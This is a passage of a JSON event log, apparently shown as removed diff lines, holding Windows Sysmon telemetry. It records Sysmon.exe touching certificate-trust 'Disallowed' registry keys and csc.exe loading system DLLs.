"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860110000, - "unique_pid": 